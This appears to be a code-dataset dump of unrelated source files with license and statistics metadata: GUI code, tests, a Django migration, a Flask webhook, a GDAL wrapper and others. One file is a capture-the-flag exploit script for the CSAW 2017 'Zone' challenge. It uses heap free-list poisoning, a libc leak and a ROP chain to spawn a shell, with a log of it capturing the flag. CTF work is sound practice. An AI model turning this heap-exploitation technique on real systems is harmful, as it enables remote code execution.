self.retry_button = wx.Button(self, label="Retry")
self.cancel_button = wx.Button(self, label="Cancel")
self.retry_button.Bind(wx.EVT_BUTTON, self.on_accept)
self.cancel_button.Bind(wx.EVT_BUTTON, self.on_cancel)
self.retry_button.SetDefault()
def _do_layout(self):
vsizer = wx.BoxSizer(wx.VERTICAL)
flag = wx.ALIGN_CENTER | wx.ALL
border = 10
vsizer.Add(self.header_text, flag=flag, border=border)
vsizer.Add(self.error_text, flag=flag, border=border)
line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL)
vsizer.Add(line, flag=wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.RIGHT | wx.TOP, border=5)
button_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_sizer.Add(self.retry_button, flag=wx.RIGHT, border=5)
button_sizer.Add(self.cancel_button, flag=wx.LEFT, border=5)
vsizer.Add(button_sizer, flag=flag, border=border)
padding_sizer = wx.BoxSizer(wx.HORIZONTAL)
padding_sizer.Add(vsizer, flag=wx.ALL, border=20)
self.SetSizerAndFit(padding_sizer)
def on_cancel(self, event):
self.Close()
def on_accept(self, event):
self.handler.retry_downloads()
self.Close()
|
gpl-3.0
| -8,906,130,566,601,220,000
| 36.244755
| 95
| 0.604131
| false
| 3.622449
| false
| false
| false
|
firebase/grpc-SwiftPM
|
src/python/grpcio_tests/tests_aio/unit/init_test.py
|
1
|
1698
|
# Copyright 2019 The gRPC Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import unittest
import grpc
from grpc.experimental import aio
from tests_aio.unit._test_server import start_test_server
from tests_aio.unit._test_base import AioTestBase
class TestInsecureChannel(AioTestBase):
async def test_insecure_channel(self):
server_target, _ = await start_test_server() # pylint: disable=unused-variable
channel = aio.insecure_channel(server_target)
self.assertIsInstance(channel, aio.Channel)
class TestSecureChannel(AioTestBase):
"""Test a secure channel connected to a secure server"""
def test_secure_channel(self):
async def coro():
server_target, _ = await start_test_server(secure=True) # pylint: disable=unused-variable
credentials = grpc.local_channel_credentials(
grpc.LocalConnectionType.LOCAL_TCP)
secure_channel = aio.secure_channel(server_target, credentials)
self.assertIsInstance(secure_channel, aio.Channel)
self.loop.run_until_complete(coro())
if __name__ == '__main__':
logging.basicConfig()
unittest.main(verbosity=2)
|
apache-2.0
| -660,082,624,246,504,200
| 32.294118
| 102
| 0.717314
| false
| 4.023697
| true
| false
| false
|
aggrent/cab
|
cab/migrations/0002_migrate_ratings.py
|
1
|
7081
|
# encoding: utf-8
from south.v2 import DataMigration
from django.contrib.contenttypes.models import ContentType
from django.db.models import signals
from ratings.models import RatedItem, SimilarItem
class Migration(DataMigration):
def forwards(self, orm):
signals.post_save.disconnect(sender=RatedItem, dispatch_uid='update_rating_score')
try:
ctype = ContentType.objects.get(app_label='cab', model='snippet')
except ContentType.DoesNotExist:
# If the content type doesn't even exist yet, this is probably a fresh installation
return
for rating in orm['cab.rating'].objects.all():
RatedItem.objects.create(
user_id=rating.user.pk,
object_id=rating.snippet.pk,
content_type=ctype,
score=rating.score)
def backwards(self, orm):
RatedItem.objects.all().delete()
SimilarItem.objects.all().delete()
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cab.bookmark': {
'Meta': {'object_name': 'Bookmark'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'snippet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmarks'", 'to': "orm['cab.Snippet']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cab_bookmarks'", 'to': "orm['auth.User']"})
},
'cab.language': {
'Meta': {'object_name': 'Language'},
'file_extension': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language_code': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'cab.rating': {
'Meta': {'object_name': 'Rating'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'score': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'snippet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ratings'", 'to': "orm['cab.Snippet']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cab_ratings'", 'to': "orm['auth.User']"})
},
'cab.snippet': {
'Meta': {'object_name': 'Snippet'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bookmark_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'code': ('django.db.models.fields.TextField', [], {}),
'description': ('django.db.models.fields.TextField', [], {}),
'description_html': ('django.db.models.fields.TextField', [], {}),
'highlighted_code': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cab.Language']"}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'rating_score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['cab']
|
bsd-3-clause
| -4,519,894,992,598,839,300
| 63.963303
| 163
| 0.551758
| false
| 3.756499
| false
| false
| false
|
integeruser/on-pwning
|
2017-csaw-quals/Zone/zone.py
|
1
|
3639
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
context(arch='amd64', os='linux', aslr=True, terminal=['tmux', 'neww'])
if args['GDB']:
elf, libc = ELF('./zone-amd64-2.23-0ubuntu9'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = gdb.debug('./zone-amd64-2.23-0ubuntu9', gdbscript='''\
c
''')
elif args['REMOTE']:
elf, libc = ELF('./zone'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = remote('pwn.chal.csaw.io', 5223)
else:
elf, libc = ELF('./zone-amd64-2.23-0ubuntu9'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = process(['stdbuf', '-i0', '-o0', '-e0', './zone-amd64-2.23-0ubuntu9'])
def allocate(size):
io.recvuntil('5) Exit\n')
io.sendline('1')
io.sendline(str(size))
def delete_last():
io.recvuntil('5) Exit\n')
io.sendline('2')
io.recvuntil('Free')
def write_last(data, newline=True):
io.recvuntil('5) Exit\n')
io.sendline('3')
io.sendline(data) if newline else io.send(data)
def print_last():
io.recvuntil('5) Exit\n')
io.sendline('4')
return io.recvline()
io.recvuntil('Environment setup: ')
stack_leak_address = int(io.recvline(), 16)
success('stack leak address: %s' % hex(stack_leak_address))
# a chunk is of the form
# {size|ptr to the next free chunk of same size|data}
# allocate a 0x40 byte block
allocate(0x40)
# overflow the 65th byte of the block to be 0x80, so to modify the size of the next free block
write_last('A' * 0x40 + chr(0x80), newline=False)
# allocate another 0x40 byte block (the one with the size modified)
allocate(0x40)
# free this last block (which will be put at the top of the list of free chunks of size 0x80)
delete_last()
# allocate a chunk of size 0x80 to get this chunk
allocate(0x80)
# we can now write 0x80 characters into a chunk which is in the list of chunks of size 0x40
# so we can overflow in the next 0x40 chunk and mess its pointer to the next free chunk
write_last(fit({cyclic_find('jaaaaaaa', n=8): p64(stack_leak_address + 0x80 - 0x8)}))
# allocate two more 0x40 chunks
# the second chunk will be in the stack (since, in the first chunk, we changed the pointer to the next free)
allocate(0x40)
allocate(0x40)
# print the content of the chunk to leak an address from libc
libc_leak_address = u64(print_last()[:6].ljust(8, '\x00'))
success('libc leak address: %s' % hex(libc_leak_address))
libc.address = libc_leak_address - (libc.symbols['__libc_start_main'] + 240)
success('libc address: %s' % hex(libc.address))
rop = ROP(libc)
rop.system(next(libc.search('/bin/sh')))
print rop.dump()
# write in the chunk to change the return address
write_last(bytes(rop))
# exit to return to execute the rop chain
io.recvuntil('5) Exit\n')
io.sendline('5')
io.interactive()
# $ ./zone.py REMOTE
# [+] Opening connection to pwn.chal.csaw.io on port 5223: Done
# [*] '/home/ubuntu/vbox/zone'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
# [*] '/home/ubuntu/vbox/libc-amd64-2.23-0ubuntu9.so'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [+] stack leak address: 0x7ffd63409140
# [+] libc leak address: 0x7efc0b64a830
# [+] libc address: 0x7efc0b62a000
# [*] Loaded cached gadgets for './libc-amd64-2.23-0ubuntu9.so'
# 0x0000: 0x7efc0b64b102 pop rdi; ret
# 0x0008: 0x7efc0b7b6d17
# 0x0010: 0x7efc0b66f390 system
# 0x0018: 'gaaahaaa' <pad>
# [*] Switching to interactive mode
# $ ls
# flag
# zone
# $ cat flag
# flag{d0n7_let_m3_g3t_1n_my_z0n3}
|
mit
| 7,253,582,822,140,688,000
| 30.921053
| 108
| 0.663094
| false
| 2.663982
| false
| false
| false
|
apbard/scipy
|
scipy/constants/tests/test_constants.py
|
2
|
3115
|
from __future__ import division, print_function, absolute_import
from numpy.testing import assert_equal, assert_allclose
from scipy._lib._numpy_compat import suppress_warnings
import scipy.constants as sc
def test_convert_temperature():
assert_equal(sc.convert_temperature(32, 'f', 'Celsius'), 0)
assert_equal(sc.convert_temperature([0, 0], 'celsius', 'Kelvin'),
[273.15, 273.15])
assert_equal(sc.convert_temperature([0, 0], 'kelvin', 'c'),
[-273.15, -273.15])
assert_equal(sc.convert_temperature([32, 32], 'f', 'k'), [273.15, 273.15])
assert_equal(sc.convert_temperature([273.15, 273.15], 'kelvin', 'F'),
[32, 32])
assert_equal(sc.convert_temperature([0, 0], 'C', 'fahrenheit'), [32, 32])
assert_allclose(sc.convert_temperature([0, 0], 'c', 'r'), [491.67, 491.67],
rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 491.67], 'Rankine', 'C'),
[0., 0.], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 491.67], 'r', 'F'),
[32., 32.], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([32, 32], 'fahrenheit', 'R'),
[491.67, 491.67], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([273.15, 273.15], 'K', 'R'),
[491.67, 491.67], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 0.], 'rankine', 'kelvin'),
[273.15, 0.], rtol=0., atol=1e-13)
def test_fahrenheit_to_celsius():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`F2C` is deprecated!")
assert_equal(sc.F2C(32), 0)
assert_equal(sc.F2C([32, 32]), [0, 0])
def test_celsius_to_kelvin():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`C2K` is deprecated!")
assert_equal(sc.C2K([0, 0]), [273.15, 273.15])
def test_kelvin_to_celsius():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`K2C` is deprecated!")
assert_equal(sc.K2C([0, 0]), [-273.15, -273.15])
def test_fahrenheit_to_kelvin():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`F2K` is deprecated!")
sup.filter(DeprecationWarning, "`F2C` is deprecated!")
sup.filter(DeprecationWarning, "`C2K` is deprecated!")
assert_equal(sc.F2K([32, 32]), [273.15, 273.15])
def test_kelvin_to_fahrenheit():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`K2F` is deprecated!")
sup.filter(DeprecationWarning, "`K2C` is deprecated!")
sup.filter(DeprecationWarning, "`C2F` is deprecated!")
assert_equal(sc.K2F([273.15, 273.15]), [32, 32])
def test_celsius_to_fahrenheit():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`C2F` is deprecated!")
assert_equal(sc.C2F([0, 0]), [32, 32])
def test_lambda_to_nu():
assert_equal(sc.lambda2nu(sc.speed_of_light), 1)
def test_nu_to_lambda():
assert_equal(sc.nu2lambda(1), sc.speed_of_light)
|
bsd-3-clause
| 973,531,989,903,674,900
| 38.43038
| 79
| 0.608026
| false
| 3.000963
| true
| false
| false
|
longaccess/longaccess-client
|
lacli/upload.py
|
1
|
8840
|
from lacli.exceptions import PauseEvent
from lacli.pool import MPUpload
from lacli.source.chunked import ChunkedFile
from lacore.storage.s3 import MPConnection
from lacore.api import UploadState as BaseUploadState
from contextlib import contextmanager
from lacli.log import getLogger
from lacli.progress import queueHandler
from lacli.control import ControlHandler
from lacli.worker import WorkerPool
from lacore.async import block
from twisted.internet import defer, threads
from itertools import count
from multiprocessing import TimeoutError
from multiprocessing import get_logger as mp_logging_init
import errno
import signal
class LogHandler(queueHandler):
def __init__(self, logger='lacli'):
self.logger = getLogger(logger)
def handle(self, msg):
self.logger.handle(msg)
class UploadState(BaseUploadState):
states = None
@classmethod
def has_state(cls, fname):
if cls.states is None:
cls.setup()
if fname in cls.states:
return True
return False
@classmethod
def init(cls, cache):
cls.cache = cache
@classmethod
def setup(cls):
uploads = cls.cache._get_uploads()
a = cls.cache._for_adf('archives')
sz = lambda f: a[f]['archive'].meta.size
cls.states = {k: cls(k, sz(k), **v)
for k, v in uploads.iteritems()
if k in a}
@classmethod
def get(cls, fname, size=None, capsule=None, sandbox=False):
if cls.states is None:
cls.setup()
if fname in cls.states:
state = cls.states[fname]
msg = "Can't change {} for upload"
if size is not None:
assert state.size == size, msg.format('size')
cls.states[fname].size = size
if capsule is not None:
# might be helpful if you want to change the capsule
if state.capsule is None:
state.capsule = capsule
cid = state.capsule.get('id', None)
assert cid == capsule['id'], msg.format('capsule')
cls.states[fname].capsule = capsule
if sandbox is True:
assert state.sandbox == sandbox, msg.format('sandbox status')
cls.states[fname].sandbox = True
return cls.states[fname]
cls.states[fname] = UploadState(fname, size, capsule=capsule,
sandbox=sandbox)
return cls.states[fname]
@classmethod
def reset(cls, fname):
if cls.states is None:
cls.setup()
if fname not in cls.states:
raise ValueError("Upload doesn't exist!")
cls.cache._del_upload(fname)
return cls.states.pop(fname)
def __init__(self, archive, size, keys=[],
exc=None, paused=True, **kwargs):
super(UploadState, self).__init__(archive, size, **kwargs)
self.cache = type(self).cache
self.logfile = self.control = None
self.keys = keys
self.progress = reduce(lambda x, y: x + y['size'], self.keys, 0)
self.pausing = False
self._paused = paused
self.exc = exc
self.deferred_upload = None
def __enter__(self):
try:
self.exc = None
self.control = ControlHandler()
self.logfile = self.cache._upload_open(self.archive, mode='r+')
getLogger().debug("Found state file for %s", self.archive)
except IOError as e:
if e.errno == errno.ENOENT:
getLogger().debug("Creating state file for %s", self.archive)
self.logfile = self.cache._upload_open(self.archive, mode='w+')
else:
raise e
# update keys from file
upload = self.cache._validate_upload(self.logfile)
self.uri = upload.get('uri', self.uri)
self.keys = upload.get('keys', self.keys)
if self._paused is True:
self._paused = False
self.cache._write_upload(
self.uri, self.capsule, self.logfile,
self.exc, self._paused)
return self
@block
@defer.inlineCallbacks
def wait_for_upload(self):
try:
result = yield self.deferred_upload
defer.returnValue(result)
except PauseEvent:
pass
if self.pausing is True:
self.paused()
def __exit__(self, type, value, traceback):
if type is not None:
if type == PauseEvent:
getLogger().debug("upload paused.")
self.paused()
else:
getLogger().debug("error in upload", exc_info=True)
self.error(value)
if self.logfile is not None:
self.logfile.close()
self.logfile = self.control = None
return type is None
def keydone(self, key, size):
assert self.logfile is not None, "Log not open"
self.keys.append(
self.cache._checkpoint_upload(key, size, self.logfile))
def update(self, progress):
self.progress = progress
@property
def seq(self):
return len(self.keys)
def pause(self):
if not self.pausing and self.control is not None:
self.control.pause()
self.pausing = True
def paused(self):
getLogger().debug("upload state paused")
if self.exc is not None:
getLogger().debug("can't pause a failed upload")
return
self._paused = True
if self.pausing is True:
self.pausing = False
self.cache._write_upload(
self.uri, self.capsule, self.logfile,
self.exc, self._paused)
def active(self):
return self._paused is False and self.exc is None
def signal(self, sig, frame):
getLogger().debug("Got interrupt")
if sig == signal.SIGINT:
getLogger().debug("Pausing")
if self.pausing is True:
raise SystemExit("Interrupted")
self.pausing = True
self.control.pause()
def save_op(self, op):
assert self.uri is None, "Can't change URI for upload state"
if op.uri is None:
return
self.cache._write_upload(op.uri, self.capsule, self.logfile,
self.exc, self._paused)
self.uri = op.uri
def error(self, exc):
if self.exc is None:
self.cache._write_upload(self.uri, self.capsule,
self.logfile, str(exc), self._paused)
self.exc = exc
class Upload(object):
def __init__(self, session, nprocs, debug, state):
self.prefs = {
'nprocs': nprocs,
'debugworker': debug > 2
}
self.log = LogHandler()
self.state = state
@contextmanager
def _workers(self, progq):
with self.log as logq:
with self.state.control as ctrlq:
mp_logging_init()
pool = WorkerPool(
self.prefs, logq, progq, ctrlq)
try:
yield pool
finally:
getLogger().debug("terminating pool")
pool.terminate()
pool.join()
def upload_temp(self, token, source, etags, pool, seq):
key = "temp-archive-{seq}".format(seq=seq)
connection = MPConnection(**token)
with MPUpload(connection, source, key) as uploader:
etags[key], source = uploader.get_result(
uploader.submit_job(pool))
return source
@defer.inlineCallbacks
def upload(self, fname, upload, progq):
with self._workers(progq) as pool:
etags = {}
source = ChunkedFile(fname, self.state.progress)
token = yield upload.status
for seq in count(start=self.state.seq):
try:
source = yield threads.deferToThread(
self.upload_temp, token, source, etags, pool, seq)
except PauseEvent:
getLogger().debug(
"paused after uploading %d temporary keys", seq)
raise
except TimeoutError:
getLogger().debug(
"timeout after uploading %d temporary keys", seq)
token = yield upload.status
if source is None:
getLogger().debug("uploaded entire archive")
break
getLogger().debug("uploaded %d temp keys", len(etags))
for key, tag in etags.iteritems():
getLogger().debug("key: %s (etag: %s)", key, tag)
# vim: et:sw=4:ts=4
|
apache-2.0
| 7,196,664,246,178,638,000
| 33.131274
| 79
| 0.552262
| false
| 4.337586
| false
| false
| false
|
MukunthanAlagarsamy/UCC_attempt1
|
app.py
|
1
|
1772
|
#!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = makeWebhookResult(req)
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def makeWebhookResult(req):
if req.get("result").get("action") != "shipping.cost":
return {}
if req.get("result").get("action") == "shipping.cost":
result = req.get("result")
parameters = result.get("parameters")
zone = parameters.get("shipping-zone")
cost = {'Europe':100, 'North America':200, 'South America':300, 'Asia':400, 'Africa':500}
speech = "The cost of shipping to " + zone + " is " + str(cost[zone]) + " euros."
if req.get("result").get("action") == "product.identification":
# result = req.get("result")
# parameters = result.get("parameters")
# zone = parameters.get("producttype")
# cost = {'TV':100, 'Mobile':"Whats the problem with your Mobile", 'Bank':'Whats the problem with your Bank'}
speech = "Thank u"
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
#"data": {},
# "contextOut": [],
"source": "apiai-onlinestore-shipping"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print "Starting app on port %d" % port
app.run(debug=True, port=port, host='0.0.0.0')
|
apache-2.0
| 590,739,204,705,281,700
| 25.447761
| 116
| 0.597065
| false
| 3.508911
| false
| false
| false
|
ProstoKSI/django-weed
|
djweed/db_fields.py
|
1
|
2767
|
from django.contrib.contenttypes.models import ContentType
try:
from django.core.urlresolvers import reverse
except ImportError: # Django 2.0
from django.urls import reverse
from django.db.models.fields.files import FieldFile, FileField
from django.utils import six
from .storage import WeedFSStorage
class WeedFSFieldFile(FieldFile):
def _split_name(self):
splitted_name = self.name.split(':', 1)
if len(splitted_name) == 2:
return splitted_name
return splitted_name[0], ''
def _get_storage_fid(self):
return self._split_name()[0]
storage_fid = property(_get_storage_fid)
def _get_verbose_name(self):
return self._split_name()[1]
verbose_name = property(_get_verbose_name)
def _get_content(self):
self._require_file()
return self.storage.content(self.storage_fid)
content = property(_get_content)
def _get_url(self):
self._require_file()
content_type = ContentType.objects.get_for_model(self.instance._meta.model)
return reverse('weedfs_get_file', kwargs={
'content_type_id': content_type.id,
'object_id': self.instance.id,
'field_name': self.field.name,
'file_name': self.verbose_name,
})
url = property(_get_url)
def _get_storage_url(self):
self._require_file()
return self.storage.url(self.storage_fid)
storage_url = property(_get_storage_url)
class WeedFSFileField(FileField):
# The class to wrap instance attributes in. Accessing the file object off
# the instance will always return an instance of attr_class.
attr_class = WeedFSFieldFile
def __init__(self, verbose_name=None, name=None, storage=None, **kwargs):
kwargs.pop('upload_to', None)
storage = kwargs.pop('storage', None)
if storage is None:
storage = WeedFSStorage()
super(WeedFSFileField, self).__init__(verbose_name, name,
storage=storage, **kwargs)
def get_prep_value(self, value):
"Returns field's value prepared for saving into a database."
# Need to convert File objects provided via a form to unicode for database insertion
if value is None:
return None
if isinstance(value, six.string_types):
return six.text_type(value)
if value.name == '':
return ''
if isinstance(value, WeedFSFieldFile):
return value.name
return self.storage.save(None, value)
def south_field_triple(self):
from south.modelsinspector import introspector
field_class = "django.db.models.fields.CharField"
args, kwargs = introspector(self)
return (field_class, args, kwargs)
|
mit
| 4,202,618,077,747,209,000
| 32.743902
| 92
| 0.641128
| false
| 3.924823
| false
| false
| false
|
COCS4950G7/COSC4950
|
Resources/Tkinter Examples/Tkinter_example.py
|
1
|
1256
|
#import Tkinter
#l = Tkinter.Label(text = "***************************See me?*************************")
#l.pack()
#l.mainloop()
#print("Howdy")
#omfg
#print("dostuff")
# http://www.ferg.org/thinking_in_tkinter/all_programs.html
from Tkinter import *
class MyApp:
def __init__(self, parent):
self.myParent = parent ### (7) remember my parent, the root
self.myContainer1 = Frame(parent)
self.myContainer1.pack()
self.button1 = Button(self.myContainer1)
self.button1.configure(text="OK", background= "green")
self.button1.pack(side=LEFT)
self.button1.bind("<Button-1>", self.button1Click) ### (1)
self.button2 = Button(self.myContainer1)
self.button2.configure(text="Cancel", background="red")
self.button2.pack(side=RIGHT)
self.button2.bind("<Button-1>", self.button2Click) ### (2)
def button1Click(self, event): ### (3)
if self.button1["background"] == "green": ### (4)
self.button1["background"] = "yellow"
else:
self.button1["background"] = "green"
def button2Click(self, event): ### (5)
self.myParent.destroy() ### (6)
root = Tk()
myapp = MyApp(root)
root.mainloop()
|
gpl-3.0
| 5,148,761,549,873,680,000
| 19.95
| 88
| 0.57086
| false
| 3.305263
| false
| false
| false
|
barthoekstra/Orographic-Landscape-Navigator
|
gisactions.py
|
1
|
1466
|
#!/usr/bin/python
# This code is simply a wrapper for running gdal commands, without MATLAB
# causing issues with dependencies, etc.
import sys
import os
print(sys.argv[0])
action = sys.argv[1]
targetfile = sys.argv[2]
if action == "merge":
print('Mergeing...')
# gdalbuildvrt merged.vrt r14bn2.wgs84.tif r14en1.wgs84.tif r14ez1.wgs84.tif r14bz2.wgs84.tif r14bz1.wgs84.tif r14bn1.wgs84.tif r09dz1.wgs84.tif r09dz2.wgs84.tif r09gz1.wgs84.tif
# gdalbuildvrt output.vrt files-to-be-merged.tif separated-by-spaces.tif
# python gisactions.py merge data/dem/output.vrt data/dem/r14bn2.wgs84.tif data/dem/r14bn1.wgs84.tif
# First create a virtual mosaic
# Cmd format: gdalbuildvrt output.vrt file1.tif file2.tif file3.tif
print('Creating mosaic...')
targetvrt = targetfile.replace(".tif", ".vrt")
cmd_mosaic = "gdalbuildvrt %s %s" % (targetvrt, ' '.join(sys.argv[3:]))
os.system(cmd_mosaic)
# Now translate the mosaic to an actual GeoTiff
# Cmd format: gdal_translate -of GTiff mosaic.vrt output.tif
mergedfile = sys.argv[2].replace(".wgs84.tif", ".merged.wgs84.vrt")
cmd_merge = "gdal_translate -a_srs \"+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs\" -of GTiff %s %s" % (targetvrt, targetfile)
os.system(cmd_merge)
# Now remove the .vrt
os.remove(targetvrt)
print('Merge finished...')
elif action == "reproject":
print('Reprojecting...')
else:
print('No valid action provided.')
|
gpl-3.0
| -5,237,369,659,882,149,000
| 35.65
| 182
| 0.697817
| false
| 2.745318
| false
| false
| false
|
MaxTyutyunnikov/lino
|
obsolete/src/lino/apps/pizzeria/services.py
|
1
|
2711
|
## Copyright 2003-2007 Luc Saffre
## This file is part of the Lino project.
## Lino is free software; you can redistribute it and/or modify it
## under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## Lino is distributed in the hope that it will be useful, but WITHOUT
## ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
## or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
## License for more details.
## You should have received a copy of the GNU General Public License
## along with Lino; if not, write to the Free Software Foundation,
## Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from lino.adamo.ddl import *
from lino.adamo.datatypes import itod
from lino.apps.pizzeria import pizzeria
#from lino.apps.pizzeria.pizzeria import Orders, Products, OrderLines, Customers
class Service(pizzeria.Product):
tableName="Services"
def initTable(self,table):
pizzeria.Product.initTable(self,table)
table.addField('responsible',STRING)
class ServicesReport(DataReport):
leadTable=Service
class MyPizzeriaSchema(pizzeria.PizzeriaSchema):
tableClasses = (pizzeria.Product,
Service,
pizzeria.Customer,
pizzeria.Order, pizzeria.OrderLine)
class MyPizzeriaMain(pizzeria.PizzeriaMain):
schemaClass=MyPizzeriaSchema
"""
Welcome to MyPizzeria, a customization of the most simple Lino demo
application. Note that this application is for demonstration purposes
only.
"""
def setupMenu(self):
m = self.addMenu("my","&My Pizzeria")
self.addReportItem(
m,"services",ServicesReport,label="&Services")
pizzeria.PizzeriaMain.setupMenu(self)
class MyPizzeria(pizzeria.Pizzeria):
name="My Pizzeria"
mainFormClass=MyPizzeriaMain
def populate(dbc):
pizzeria.populate(dbc)
SERV = dbc.query(Service)
CUST = dbc.query(pizzeria.Customer)
ORDERS = dbc.query(pizzeria.Order)
PROD = dbc.query(pizzeria.Product)
s1 = SERV.appendRow(name="bring home",price=1)
s2 = SERV.appendRow(name="organize party",price=100)
c3 = CUST.appendRow(name="Bernard")
o1 = ORDERS.appendRow(customer=c3,date=itod(20040318))
q = o1.lines()
q.appendRow(product=PROD.peek(1),qty=1)
q.appendRow(product=s1,qty=1)
o2 = ORDERS.appendRow(customer=CUST.peek(1),date=itod(20040319))
q = o2.lines()
q.appendRow(product=PROD.peek(1),qty=2)
q.appendRow(product=PROD.peek(2),qty=3)
o1.register()
o2.register()
|
gpl-3.0
| 4,601,415,181,698,994,000
| 27.536842
| 80
| 0.694947
| false
| 3.242823
| false
| false
| false
|
cwoebker/relo
|
relo/core/backend/redisdb.py
|
1
|
1633
|
#!/usr/bin/env python
# encoding: utf-8
import sys
import os
import redis
